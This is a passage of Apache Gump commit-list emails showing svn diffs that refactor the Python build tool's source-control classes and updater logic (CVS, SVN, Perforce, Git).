(161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2009 03:28:25 -0000 Received: (qmail 97244 invoked by uid 500); 12 Feb 2009 03:28:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97235 invoked by uid 99); 12 Feb 2009 03:28:25 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Feb 2009 19:28:25 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 12 Feb 2009 03:28:23 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 8E63A23888F1; Thu, 12 Feb 2009 03:28:02 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r743611 - in /gump/trunk/python/gump/core: model/repository.py run/gumpenv.py Date: Thu, 12 Feb 2009 03:28:02 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Thu Feb 12 03:28:00 2009 New Revision: 743611 URL: http://svn.apache.org/viewvc?rev=743611&view=rev Log: make on Solaris doesn't seem to like --version Modified: gump/trunk/python/gump/core/model/repository.py gump/trunk/python/gump/core/run/gumpenv.py Modified: gump/trunk/python/gump/core/model/repository.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/model/repository.py?rev=743611&r1=743610&r2=743611&view=diff ============================================================================== --- gump/trunk/python/gump/core/model/repository.py (original) +++ gump/trunk/python/gump/core/model/repository.py Thu Feb 12 03:28:00 2009 @@ -30,7 +30,7 @@ class Repository(NamedModelObject, Statable): """ - A named repository (CVS|SVN|Artifacts|GIT) + A named repository (CVS|SVN|Perforce|Artifacts|GIT) """ def __init__(self,name,dom,workspace): @@ -46,7 +46,7 @@ try: self.type = typeToLabel[type] except: - raise RuntimeError, 'Invalid Repository Type:' + str(xml.type) + raise RuntimeError, 'Invalid Repository Type:' + str(xml.type) if 'cvs'==type: self.web=self.getDomChildValue('cvsweb') or \ @@ -66,7 +66,8 @@ root=self.getDomChild('root') self.p4port=getDomChildValue(root,'hostname') else: - raise RuntimeError, 'No Perforce server on P4 repository: ' + self.getName() + raise RuntimeError, 'No Perforce server on P4 repository: ' \ + + self.getName() self.web=self.getDomChildValue('web') else: if self.hasDomChild('url'): Modified: gump/trunk/python/gump/core/run/gumpenv.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/run/gumpenv.py?rev=743611&r1=743610&r2=743611&view=diff ============================================================================== --- gump/trunk/python/gump/core/run/gumpenv.py (original) +++ gump/trunk/python/gump/core/run/gumpenv.py Thu Feb 12 03:28:00 2009 @@ -182,7 +182,8 @@ self.noMono = self._checkWithDashVersion('mono', "no Mono runtime") - self.noMake = self._checkWithDashVersion('make', "no make builds") + self.noMake = self._checkWithDashVersion('make', "no make builds", + "--help") self.noGit = self._checkWithDashVersion('git', 'no git repository updates') From [email protected] Thu Feb 12 04:26:30 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38796 invoked from network); 12 Feb 2009 04:26:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2009 04:26:30 -0000 Received: (qmail 27965 invoked by uid 500); 12 Feb 2009 04:26:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27955 invoked by uid 99); 12 Feb 2009 04:26:22 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Feb 2009 20:26:22 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 12 Feb 2009 04:26:19 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 450F723888F1; Thu, 12 Feb 2009 04:25:58 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r743615 - /gump/trunk/python/gump/core/update/updater.py Date: Thu, 12 Feb 2009 04:25:57 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Thu Feb 12 04:25:57 2009 New Revision: 743615 URL: http://svn.apache.org/viewvc?rev=743615&view=rev Log: reduce some duplication in updater, prepare for more changes Modified: gump/trunk/python/gump/core/update/updater.py Modified: gump/trunk/python/gump/core/update/updater.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/updater.py?rev=743615&r1=743614&r2=743615&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/updater.py (original) +++ gump/trunk/python/gump/core/update/updater.py Thu Feb 12 04:25:57 2009 @@ -57,10 +57,9 @@ def __init__(self,run): RunSpecific.__init__(self, run) - self.cvs=CvsUpdater(run) - self.svn=SvnUpdater(run) - self.p4=P4Updater(run) - self.git=GitUpdater(run) + self.updaters = {'cvs' : CvsUpdater(run), 'svn' : SvnUpdater(run), + 'p4' : P4Updater(run), 'git' : GitUpdater(run)} + """ @@ -102,9 +101,10 @@ workspace = self.run.getWorkspace() - log.debug("Workspace CVS|SVN|P4|GIT Directory: " + workspace.getSourceControlStagingDirectory()) + log.debug("Workspace CVS|SVN|P4|GIT Directory: " \ + + workspace.getSourceControlStagingDirectory()) - # Update all the modules that have CVS repositories + # Update all the modules that have repositories for module in list: self.updateModule(module) @@ -124,14 +124,9 @@ if module.okToPerformWork(): ok = 0 - if module.hasCvs(): - ok=self.cvs.updateModule(module) - elif module.hasSvn(): - ok=self.svn.updateModule(module) - if module.hasP4(): - ok=self.p4.updateModule(module) - elif module.hasGit(): - ok=self.git.updateModule(module) + scmUpdater = self.getScmUpdater(module) + if scmUpdater: + scmUpdater.updateModule(module) else: # :TODO: Now what? pass @@ -141,6 +136,20 @@ self.syncModule(module) + def getScmUpdater(self, module): + """ + Finds the correct SCM updater for a given module + """ + if module.hasCvs(): + return self.updaters['cvs'] + elif module.hasSvn(): + return self.updaters['svn'] + elif module.hasP4(): + return self.updaters['p4'] + elif module.hasGit(): + return self.updaters['git'] + return None + def syncModule(self,module): """ @@ -158,15 +167,17 @@ changesFile = os.path.abspath( \ os.path.join( \ workspace.tmpdir, \ - 'changes_to_'+gumpSafeName(module.getName())+'.txt')) + 'changes_to_'\ + + gumpSafeName(module.getName())+'.txt')) # Perform the operation. - (actions,modified,cleaned)=syncDirectories(sourcedir,destdir,module,changesFile) + (actions,modified,cleaned)=syncDirectories(sourcedir,destdir,module, + changesFile) # We are good to go... module.changeState(STATE_SUCCESS) - # Were the contents of the repository modified? + # Were the contents of the repository modified? if modified: # @@ -200,13 +211,8 @@ """ - if module.hasCvs(): - ok=self.cvs.preview(module) - elif module.hasSvn(): - ok=self.svn.preview(module) - elif module.hasP4(): - ok=self.p4.preview(module) - elif module.hasGit(): - ok=self.git.preview(module) + scmUpdater = self.getScmUpdater(module) + if scmUpdater: + scmUpdater.preview(module) else: print 'No updater for module: ' + module.getName() From [email protected] Thu Feb 12 04:54:32 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43025 invoked from network); 12 Feb 2009 04:54:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2009 04:54:32 -0000 Received: (qmail 43580 invoked by uid 500); 12 Feb 2009 04:54:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43571 invoked by uid 99); 12 Feb 2009 04:54:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Feb 2009 20:54:31 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 12 Feb 2009 04:54:29 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 37B8623888F1; Thu, 12 Feb 2009 04:54:08 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r743620 - /gump/trunk/python/gump/core/model/module.py Date: Thu, 12 Feb 2009 04:54:07 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Thu Feb 12 04:54:07 2009 New Revision: 743620 URL: http://svn.apache.org/viewvc?rev=743620&view=rev Log: simplify Module-SCM object model Modified: gump/trunk/python/gump/core/model/module.py Modified: gump/trunk/python/gump/core/model/module.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/model/module.py?rev=743620&r1=743619&r2=743620&view=diff ============================================================================== --- gump/trunk/python/gump/core/model/module.py (original) +++ gump/trunk/python/gump/core/model/module.py Thu Feb 12 04:54:07 2009 @@ -32,17 +32,44 @@ from gump.util.note import transferAnnotations, Annotatable from gump.util.domutils import * -class ModuleCvs(ModelObject): +class ModuleScm(ModelObject): def __init__(self,dom,repository): ModelObject.__init__(self,dom) - self.repository=repository + # Reference to the shared repository + self.repository = repository + + # Extract settings + self.dir = self.getDomAttributeValue('dir') + self.type = self.element.tagName + + def getRootUrl(self): + url = self.repository.getUrl() + if self.hasDir(): + url += self.getDir() + return url + + def hasDir(self): + if self.dir: return True + return False + + def getDir(self): + return self.dir + + def getViewUrl(self): + return self.getRootUrl() + + def getScmType(self): + return self.type + +class ModuleCvs(ModuleScm): + def __init__(self,dom,repository): + ModuleScm.__init__(self, dom, repository) # Extract settings self.tag = self.getDomAttributeValue('tag') self.module = self.getDomAttributeValue('module') self.hostPrefix = self.getDomAttributeValue('host-prefix') - self.dir = self.getDomAttributeValue('dir','') def getCvsRoot(self): """Construct the CVS root for this set of information""" @@ -82,13 +109,6 @@ def getHostPrefix(self): return str(self.hostPrefix) - def hasDir(self): - if self.dir: return True - return False - - def getDir(self): - return str(self.dir) - def hasModule(self): if self.module: return True return False @@ -105,38 +125,11 @@ url=self.repostory.getCvsWeb()+'/'+self.module.getName() return url -class ModuleSvn(ModelObject): - def __init__(self,dom,repository): - ModelObject.__init__(self,dom) - - # Reference to the shared repository - self.repository=repository - - # Extract settings - self.dir = self.getDomAttributeValue('dir') - - def getRootUrl(self): - url=self.repository.getUrl() - if self.hasDir(): - url+=self.getDir() - return url - - def hasDir(self): - if self.dir: return True - return False - - def getDir(self): - return self.dir - - def getViewUrl(self): - return self.getRootUrl() - -class ModuleP4(ModelObject): +class ModuleP4(ModuleScm): def __init__(self,dom,repository): - ModelObject.__init__(self,dom) + ModuleScm.__init__(self, dom, repository) # Reference to the shared repository - self.repository=repository self.hostname='perforce:1666' if repository.hasDomChild('root'): root=repository.getDomChild('root') @@ -149,9 +142,6 @@ self.tag=self.getDomAttributeValue('tag') - # Extract settings - self.dir=self.getDomAttributeValue('dir') - def getPort(self): return str(self.hostname) @@ -171,22 +161,6 @@ def getTag(self): return str(self.tag) - def getRootUrl(self): - url=self.repository.getUrl() - if self.hasDir(): - url+=self.getDir() - return url - - def hasDir(self): - if self.dir: return True - return False - - def getDir(self): - return self.dir - - def getViewUrl(self): - return self.getRootUrl() - class ModuleArtifacts(ModelObject): def __init__(self,dom,repository): ModelObject.__init__(self,dom) @@ -214,32 +188,6 @@ def getGroup(self): return self.group -class ModuleGit(ModelObject): - def __init__(self,dom,repository): - ModelObject.__init__(self,dom) - - # Reference to the shared repository - self.repository=repository - - # Extract settings - self.dir = self.getDomAttributeValue('dir') - - def getRootUrl(self): - url=self.repository.getUrl() - if self.hasDir(): - url+=self.getDir() - return url - - def hasDir(self): - if self.dir: return True - return False - - def getDir(self): - return self.dir - - def getViewUrl(self): - return self.getRootUrl() - class Module(NamedModelObject, Statable, Resultable, Positioned): """Set of Modules (which contain projects)""" def __init__(self,name,dom,owner): @@ -478,7 +426,7 @@ repo=workspace.getRepository(repoName) self.repository=repo repo.addModule(self) - self.svn=ModuleSvn(rdom,repo) + self.svn=ModuleScm(rdom,repo) else: self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) self.addError('No such repository ['+ str(repoName) +'] in workspace on [' \ @@ -522,7 +470,7 @@ repo=workspace.getRepository(repoName) self.repository=repo repo.addModule(self) - self.git=ModuleGit(rdom,repo) + self.git=ModuleScm(rdom,repo) else: self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) self.addError('No such repository ['+ str(repoName) +'] in workspace on [' \ From [email protected] Thu Feb 12 05:28:38 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51432 invoked from network); 12 Feb 2009 05:28:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2009 05:28:38 -0000 Received: (qmail 64986 invoked by uid 500); 12 Feb 2009 05:28:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64977 invoked by uid 99); 12 Feb 2009 05:28:38 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Feb 2009 21:28:38 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 12 Feb 2009 05:28:34 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 7E7C323888F1; Thu, 12 Feb 2009 05:28:13 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r743624 - in /gump/trunk/python/gump: actor/document/xdocs/documenter.py core/model/module.py core/update/cvs.py core/update/git.py core/update/p4.py core/update/svn.py core/update/updater.py Date: Thu, 12 Feb 2009 05:28:13 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Thu Feb 12 05:28:12 2009 New Revision: 743624 URL: http://svn.apache.org/viewvc?rev=743624&view=rev Log: reduce coupling of scm and updater Modified: gump/trunk/python/gump/actor/document/xdocs/documenter.py gump/trunk/python/gump/core/model/module.py gump/trunk/python/gump/core/update/cvs.py gump/trunk/python/gump/core/update/git.py gump/trunk/python/gump/core/update/p4.py gump/trunk/python/gump/core/update/svn.py gump/trunk/python/gump/core/update/updater.py Modified: gump/trunk/python/gump/actor/document/xdocs/documenter.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/actor/document/xdocs/documenter.py?rev=743624&r1=743623&r2=743624&view=diff ============================================================================== --- gump/trunk/python/gump/actor/document/xdocs/documenter.py (original) +++ gump/trunk/python/gump/actor/document/xdocs/documenter.py Thu Feb 12 05:28:12 2009 @@ -1646,32 +1646,32 @@ repoList.createEntry( "Repository: ") ) if module.hasCvs(): - if module.cvs.hasModule(): - repoList.createEntry( "CVS Module: ", module.cvs.getModule()) + if module.getScm().hasModule(): + repoList.createEntry( "CVS Module: ", module.getScm().getModule()) - if module.cvs.hasTag(): - repoList.createEntry( "CVS Tag: ", module.cvs.getTag()) + if module.getScm().hasTag(): + repoList.createEntry( "CVS Tag: ", module.getScm().getTag()) - if module.cvs.hasDir(): - repoList.createEntry( "CVS Dir: ", module.cvs.getDir()) + if module.getScm().hasDir(): + repoList.createEntry( "CVS Dir: ", module.getScm().getDir()) - if module.cvs.hasHostPrefix(): - repoList.createEntry( "CVS Host Prefix: ", module.cvs.getHostPrefix()) + if module.getScm().hasHostPrefix(): + repoList.createEntry( "CVS Host Prefix: ", module.getScm().getHostPrefix()) - repoList.createEntry( "CVSROOT: ", module.cvs.getCvsRoot()) + repoList.createEntry( "CVSROOT: ", module.getScm().getCvsRoot()) if module.hasSvn(): - if module.svn.hasDir(): - repoList.createEntry( "SVN Directory: ", module.svn.getDir()) - repoList.createEntry( "SVN URL: ", module.svn.getRootUrl()) + if module.getScm().hasDir(): + repoList.createEntry( "SVN Directory: ", module.getScm().getDir()) + repoList.createEntry( "SVN URL: ", module.getScm().getRootUrl()) if module.hasGit(): - if module.git.hasDir(): - repoList.createEntry( "GIT Directory: ", module.git.getDir()) - repoList.createEntry( "GIT URL: ", module.git.getRootUrl()) + if module.getScm().hasDir(): + repoList.createEntry( "GIT Directory: ", module.getScm().getDir()) + repoList.createEntry( "GIT URL: ", module.getScm().getRootUrl()) if module.hasArtifacts(): - if module.artifacts.hasUrl(): + if module.getScm().hasUrl(): repoList.createEntry( "Jars URL: ", module.artifacts.getUrl()) repoList.createEntry('Redistributable: ', module.isRedistributable()) Modified: gump/trunk/python/gump/core/model/module.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/model/module.py?rev=743624&r1=743623&r2=743624&view=diff ============================================================================== --- gump/trunk/python/gump/core/model/module.py (original) +++ gump/trunk/python/gump/core/model/module.py Thu Feb 12 05:28:12 2009 @@ -67,9 +67,9 @@ ModuleScm.__init__(self, dom, repository) # Extract settings - self.tag = self.getDomAttributeValue('tag') - self.module = self.getDomAttributeValue('module') - self.hostPrefix = self.getDomAttributeValue('host-prefix') + self.tag = self.getDomAttributeValue('tag') + self.module = self.getDomAttributeValue('module') + self.hostPrefix = self.getDomAttributeValue('host-prefix') def getCvsRoot(self): """Construct the CVS root for this set of information""" @@ -191,37 +191,33 @@ class Module(NamedModelObject, Statable, Resultable, Positioned): """Set of Modules (which contain projects)""" def __init__(self,name,dom,owner): - NamedModelObject.__init__(self,name,dom,owner) - - Statable.__init__(self) - Resultable.__init__(self) - Positioned.__init__(self) - - self.totalDepends=[] - self.totalDependees=[] + NamedModelObject.__init__(self,name,dom,owner) + + Statable.__init__(self) + Resultable.__init__(self) + Positioned.__init__(self) + + self.totalDepends=[] + self.totalDependees=[] - self.projects={} - + self.projects={} + self.notifys=[] - self.repository=None - self.cvs=None - self.svn=None - self.artifacts=None - self.p4=None - self.git=None - - self.packaged = False + self.repository=None + self.scms = {} + + self.packaged = False self.redistributable= False # Changes were found (when updating) - self.modified = False - - # The task of updating has occured.. - self.updated = False - - self.affected = 0 - + self.modified = False + + # The task of updating has occured.. + self.updated = False + + self.affected = 0 + # Extract settings self.tag='' @@ -236,7 +232,7 @@ def getObjectForTag(self,tag,dom,name=None): """ - Get a new (or spliced) object for this tag + Get a new (or spliced) object for this tag """ object=None @@ -259,10 +255,10 @@ return object def resolve(self): - """ - Resolving requires creating objects (in the correct lists/maps) for - certain high level XML elements, e.g. <project. - """ + """ + Resolving requires creating objects (in the correct lists/maps) for + certain high level XML elements, e.g. <project. + """ if self.isResolved(): return @@ -381,9 +377,9 @@ `packageCount` + '.)') # Determine source directory - self.absWorkingDir= \ + self.absWorkingDir= \ os.path.abspath( - os.path.join(workspace.getBaseDirectory(), + os.path.join(workspace.getBaseDirectory(), self.workdir)) self.absSrcCtlDir= \ @@ -411,7 +407,7 @@ repo=workspace.getRepository(repoName) self.repository=repo repo.addModule(self) - self.cvs=ModuleCvs(cvs,repo) + self.scms['cvs'] = ModuleCvs(cvs,repo) else: self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) self.addError('No such repository ['+ str(repoName) +'] in workspace on [' \ @@ -426,7 +422,7 @@ repo=workspace.getRepository(repoName) self.repository=repo repo.addModule(self) - self.svn=ModuleScm(rdom,repo) + self.scms['svn'] = ModuleScm(rdom,repo) else: self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) self.addError('No such repository ['+ str(repoName) +'] in workspace on [' \ @@ -441,7 +437,7 @@ repo=workspace.getRepository(repoName) self.repository=repo repo.addModule(self) - self.p4=ModuleP4(p4dom,repo) + self.scms['p4'] = ModuleP4(p4dom,repo) else: self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) self.addError('No such repository ['+ str(repoName) + '] in workspace on [' \ @@ -453,10 +449,10 @@ if repoName: if workspace.hasRepository(repoName): # It references this repository... - repo=workspace.getRepository(repoName) - self.repository=repo + repo=workspace.getRepository(repoName) + self.repository=repo repo.addModule(self) - self.artifacts=ModuleArtifacts(adom,repo) + self.scms['artifacts'] = ModuleArtifacts(adom,repo) else: self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) self.addError('No such repository ['+ str(repoName) +'] in workspace on [' \ @@ -470,7 +466,7 @@ repo=workspace.getRepository(repoName) self.repository=repo repo.addModule(self) - self.git=ModuleScm(rdom,repo) + self.scms['git'] = ModuleScm(rdom,repo) else: self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) self.addError('No such repository ['+ str(repoName) +'] in workspace on [' \ @@ -527,7 +523,7 @@ def addProject(self,project): """ - Associate this module with this project, and vice verse. + Associate this module with this project, and vice verse. """ name=project.getName() @@ -719,27 +715,22 @@ return 'http://svn.apache.org/repos/asf/gump/metadata/' + location def isUpdatable(self): - return self.hasCvs() or self.hasSvn() or self.hasArtifacts() or self.hasGit() + return len(self.scms) > 0 def hasCvs(self): - if self.cvs: return True - return False + return 'cvs' in self.scms def hasSvn(self): - if self.svn: return True - return False + return 'svn' in self.scms def hasP4(self): - if self.p4: return True - return False + return 'p4' in self.scms def hasArtifacts(self): - if self.artifacts: return True - return False + return 'artifacts' in self.scms def hasGit(self): - if self.git: return True - return False + return 'git' in self.scms # Where the contents (at the repository) Modified? def isModified(self): @@ -762,14 +753,24 @@ return self.repository def getViewUrl(self): + scm = getScm(self); + if scm: + return scm.getViewUrl() + + def getScm(self): + # this is the priority order originally present + # CVS over svn over P4 over GIT and artifacts last + + # will be swapped against a list based version later if self.hasCvs(): - return self.cvs.getViewUrl() - elif self.hasSvn(): - return self.svn.getViewUrl() - elif self.hasP4(): - return self.p4.getViewUrl() - elif self.hasGit(): - return self.git.getViewUrl() + return self.scms['cvs'] + if self.hasSvn(): + return self.scms['svn'] + if self.hasP4(): + return self.scms['p4'] + if self.hasGit(): + return self.scms['git'] + return self.scms.get('artifacts') class ModuleStatistics(Statistics): """ Modified: gump/trunk/python/gump/core/update/cvs.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/cvs.py?rev=743624&r1=743623&r2=743624&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/cvs.py (original) +++ gump/trunk/python/gump/core/update/cvs.py Thu Feb 12 05:28:12 2009 @@ -157,7 +157,7 @@ if nowork and not exists: raise RuntimeException('Not coded for this combo.') - root=module.cvs.getCvsRoot() + root=module.getScm().getCvsRoot() # Prepare CVS checkout/update command... prefix='update' @@ -174,8 +174,8 @@ # Be 'quiet' (but not silent) unless requested otherwise. if not module.isDebug() \ and not module.isVerbose() \ - and not module.cvs.isDebug() \ - and not module.cvs.isVerbose(): + and not module.getScm().isDebug() \ + and not module.getScm().isVerbose(): cmd.addParameter('-q') if nowork: @@ -193,8 +193,8 @@ # Determine if a tag is set, on <cvs or on <module tag=None - if module.cvs.hasTag(): - tag=module.cvs.getTag() + if module.getScm().hasTag(): + tag=module.getScm().getTag() elif module.hasTag(): tag=module.getTag() @@ -218,12 +218,12 @@ if tag: cmd.addParameter('-r',tag,' ') - if not module.cvs.hasModule() or \ - not module.cvs.getModule() == module.getName(): + if not module.getScm().hasModule() or \ + not module.getScm().getModule() == module.getName(): cmd.addParameter('-d',module.getName(),' ') - if module.cvs.hasModule(): - cmd.addParameter(module.cvs.getModule()) + if module.getScm().hasModule(): + cmd.addParameter(module.getScm().getModule()) else: cmd.addParameter(module.getName()) Modified: gump/trunk/python/gump/core/update/git.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/git.py?rev=743624&r1=743623&r2=743624&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/git.py (original) +++ gump/trunk/python/gump/core/update/git.py Thu Feb 12 05:28:12 2009 @@ -88,7 +88,7 @@ log.debug("Git Module Status : " + module.getName() + \ ", Repository Name: " + str(module.repository.getName())) - url=module.git.getRootUrl() + url=module.getScm().getRootUrl() log.debug("GIT URL: [" + url + "] on Repository: " + module.repository.getName()) @@ -103,14 +103,14 @@ # if not module.isDebug() \ and not module.isVerbose() \ - and not module.git.isDebug() \ - and not module.git.isVerbose(): + and not module.getScm().isDebug() \ + and not module.getScm().isVerbose(): cmd.addParameter('--quiet') # # Allow trace for debug # - # if module.isDebug() or module.git.isDebug(): + # if module.isDebug() or module.getScm().isDebug(): # cmd.addParameter('--verbose') # do an GIT status @@ -164,7 +164,7 @@ log.debug("Git Module Update : " + module.getName() + \ ", Repository Name: " + repository.getName()) - url=module.git.getRootUrl() + url=module.getScm().getRootUrl() log.debug("GIT URL: [" + url + "] on Repository: " + repository.getName()) @@ -186,14 +186,14 @@ # if not module.isDebug() \ and not module.isVerbose() \ - and not module.git.isDebug() \ - and not module.git.isVerbose(): + and not module.getScm().isDebug() \ + and not module.getScm().isVerbose(): cmd.addParameter('--quiet') # # Allow trace for debug # - # if module.isDebug() or module.git.isDebug(): + # if module.isDebug() or module.getScm().isDebug(): # cmd.addParameter('--verbose') if not exists: Modified: gump/trunk/python/gump/core/update/p4.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/p4.py?rev=743624&r1=743623&r2=743624&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/p4.py (original) +++ gump/trunk/python/gump/core/update/p4.py Thu Feb 12 05:28:12 2009 @@ -153,7 +153,7 @@ if nowork and not exists: raise RuntimeException('Not coded for this combo.') - root=module.p4.getClientspec() + root=module.getScm().getClientspec() # Prepare P4 sync command... prefix='update' directory=module.getWorkspace().getSourceControlStagingDirectory() @@ -175,15 +175,15 @@ # Determine if a tag is set, on <p4 or on <module tag=None - if module.p4.hasTag(): - tag=module.p4.getTag() + if module.getScm().hasTag(): + tag=module.getScm().getTag() elif module.hasTag(): tag=module.getTag() # Do a p4 sync - cmd.addParameter('-p',module.p4.getPort()) - cmd.addParameter('-u',module.p4.getUser()) - cmd.addParameter('-P',module.p4.getPassword()) + cmd.addParameter('-p',module.getScm().getPort()) + cmd.addParameter('-u',module.getScm().getUser()) + cmd.addParameter('-P',module.getScm().getPassword()) cmd.addParameter('-c',root) cmd.addParameter('sync') if nowork: Modified: gump/trunk/python/gump/core/update/svn.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/svn.py?rev=743624&r1=743623&r2=743624&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/svn.py (original) +++ gump/trunk/python/gump/core/update/svn.py Thu Feb 12 05:28:12 2009 @@ -103,7 +103,7 @@ log.debug("SubVersion Module Status : " + module.getName() + \ ", Repository Name: " + str(module.repository.getName())) - url=module.svn.getRootUrl() + url=module.getScm().getRootUrl() log.debug("SVN URL: [" + url + "] on Repository: " + module.repository.getName()) @@ -118,8 +118,8 @@ # if not module.isDebug() \ and not module.isVerbose() \ - and not module.svn.isDebug() \ - and not module.svn.isVerbose(): + and not module.getScm().isDebug() \ + and not module.getScm().isVerbose(): cmd.addParameter('--quiet') # @@ -191,7 +191,7 @@ log.debug("SubVersion Module Update : " + module.getName() + \ ", Repository Name: " + repository.getName()) - url=module.svn.getRootUrl() + url=module.getScm().getRootUrl() log.debug("SVN URL: [" + url + "] on Repository: " + repository.getName()) @@ -206,8 +206,8 @@ # if not module.isDebug() \ and not module.isVerbose() \ - and not module.svn.isDebug() \ - and not module.svn.isVerbose(): + and not module.getScm().isDebug() \ + and not module.getScm().isVerbose(): cmd.addParameter('--quiet') # @@ -215,7 +215,7 @@ # # SVN complains about -v|--verbose, don't ask me why # - # if module.isDebug() or module.svn.isDebug(): + # if module.isDebug() or module.getScm().isDebug(): # cmd.addParameter('--verbose') if exists: @@ -240,8 +240,8 @@ # If module name != SVN directory, tell SVN to put it into # a directory named after our module # - if not module.svn.hasDir() or \ - not module.svn.getDir() == module.getName(): + if not module.getScm().hasDir() or \ + not module.getScm().getDir() == module.getName(): cmd.addParameter(module.getName()) return (module.repository, url, cmd) Modified: gump/trunk/python/gump/core/update/updater.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/updater.py?rev=743624&r1=743623&r2=743624&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/updater.py (original) +++ gump/trunk/python/gump/core/update/updater.py Thu Feb 12 05:28:12 2009 @@ -140,14 +140,9 @@ """ Finds the correct SCM updater for a given module """ - if module.hasCvs(): - return self.updaters['cvs'] - elif module.hasSvn(): - return self.updaters['svn'] - elif module.hasP4(): - return self.updaters['p4'] - elif module.hasGit(): - return self.updaters['git'] + scm = module.getScm() + if 